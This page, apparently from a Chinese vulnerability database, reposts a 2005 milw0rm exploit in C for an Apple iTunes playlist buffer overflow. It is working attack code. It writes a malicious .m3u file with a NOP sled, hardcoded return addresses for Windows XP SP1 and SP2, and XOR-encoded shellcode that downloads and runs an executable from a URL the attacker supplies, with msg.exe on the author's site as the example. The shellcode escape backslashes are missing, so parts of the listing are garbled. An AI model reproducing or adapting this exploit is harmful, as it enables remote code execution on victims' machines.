Apple iTunes – Playlist Buffer Overflow Download Shellcode
漏洞ID | 1054861 | 漏洞类型 | |
发布时间 | 2005-01-16 | 更新时间 | 2005-01-16 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
*
* Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploit
* Bug discoveried by iDEFENSE Security (http://www.idefense.com)
* Exploit coded By ATmaCA
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: [email protected]
* Credit to xT and delikon
* Usage:exploit <Target> <OutputPath> <Url>
* Targets:
* 1 - WinXP SP1 english - kernel32.dll push eax - ret [0x77E6532A]
* 2 - WinXP SP2 english - kernel32.dll push eax - ret [0x7C80BCB0]
* Example:exploit 1 vuln.m3u http://www.atmacasoft.com/exp/msg.exe
*
*/
/*
*
* Up to iTunes version 4.7 are affected
* Tested with iTunes v4.7 on WinXp Sp2 english platform
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>
#ifdef __BORLANDC__
#include <mem.h>
#endif
#define NOP 0x90
/* (*.m3u) playlist header */
char m3u_playlist_header[] = "http://";
/* Generic win32 http download shellcode
xored with 0x1d by delikon (http://delikon.de/) */
char shellcode[] = "xEB"
"x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF"
"xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13"
"xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2"
"xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90"
"x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2"
"xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48"
"x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43"
"x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96"
"x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD"
"xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47"
"x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D"
"x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33"
"x78x65x78x1D";
char *target[]= //return addr - EIP
{
"x2Ax53xE6x77", //push eax - kernel32.dll - WinXP Sp1 english
"xB0xBCx80x7C" //push eax - kernel32.dll - WinXP Sp2 english
};
FILE *di;
int targetnum;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newshellcode;
/*xor cryptor*/
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;i<Size;i++)
Name[i]=Name[i]^xor;
return Name;
}
void main(int argc, char *argv[])
{
if (argc < 4)
{
printf("Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploitn");
printf("Bug discoveried by iDEFENSE Security (http://www.idefense.com)n");
printf("Exploit coded By ATmaCAn");
printf("Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.n");
printf("Web: http://www.atmacasoft.comn");
printf("E-Mail: [email protected]");
printf("Credit to xT and delikonnn");
printf("tUsage:exploit <Target> <OutputPath> <Url>n");
printf("tTargets:n");
printf("t1 - WinXP SP1 english - kernel32.dll push eax - ret [0x77E6532A]n");
printf("t2 - WinXP SP2 english - kernel32.dll push eax - ret [0x7C80BCB0]n");
printf("tExample:exploit 1 vuln.m3u http://www.atmacasoft.com/exp/msg.exen");
return;
}
targetnum = atoi(argv[1]) - 1;
web = argv[3];
if( (di=fopen(argv[2],"wb")) == NULL )
{
printf("Error opening file!n");
return;
}
for(i=0;i<sizeof(m3u_playlist_header)-1;i++)
fputc(m3u_playlist_header[i],di);
/*stuff in a couple of NOPs*/
for(i=0;i<3045;i++)
fputc(NOP,di);
/*Overwriting the return address (EIP) with push eax address*/
/*located somewhere in process space*/
fprintf(di,"%s",target[targetnum]); // - ret
for(i=0;i<50;i++) //NOPs
fputc(NOP,di);
weblength=(short int)0xff22;
pointer=strstr(shellcode,"x22xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
strcpy(newshellcode,shellcode);
strcat(newshellcode,Sifrele(web));
strcat(newshellcode,"x1d");
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode[i],di);
//for(i=0;i<50;i++) //NOPs
//fputc(NOP,di);
printf("Vulnarable m3u file %s has been generated!n",argv[2]);
fclose(di);
}
// milw0rm.com [2005-01-16]
相关推荐: UBBCentral UBB.threads Dosearch.PHP SQL Injection Vulnerability
UBBCentral UBB.threads Dosearch.PHP SQL Injection Vulnerability 漏洞ID 1097771 漏洞类型 Input Validation Error 发布时间 2004-10-21 更新时间 2004…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666